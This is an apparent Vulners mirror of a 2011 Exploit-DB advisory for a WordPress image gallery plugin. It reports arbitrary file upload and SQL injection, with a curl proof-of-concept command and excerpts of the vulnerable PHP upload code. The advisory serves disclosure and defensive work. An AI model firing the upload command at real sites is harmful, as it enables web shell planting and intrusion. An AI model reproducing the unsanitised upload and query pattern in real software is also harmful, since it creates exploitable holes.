Lucene search
K

WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities

🗓️ 31 Aug 2011 00:00:00Reported by Hrvoje SpoljarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

WordPress Plugin image Gallery with Slideshow 1.5 - Arbitrary file upload / SQL injection vulnerabilit

Code
Title: Wordpress image-gallery-with-slideshow plugin <= 1.5 Arbitrary file
upload / SQL injection
Version:1.5
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Software link:
http://wordpress.org/extend/plugins/image-gallery-with-slideshow/

PoC:
curl -F "[email protected]"
http://domain.tld/wp-content/plugins/image-gallery-with-slideshow/upload-file.php

File(s):upload-file.php
Code:
$new_image =time()."_".$_FILES['uploadfile']['name'];
$original_image = $_FILES['uploadfile']['name'];
...
$value_org = move_uploaded_file($_FILES['uploadfile']['tmp_name'],
$file_original);
$insert_query = "INSERT INTO `".$table_prefix."combo_image`
VALUES('','0','".$new_image."','".$original_image."','','','',NOW())";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation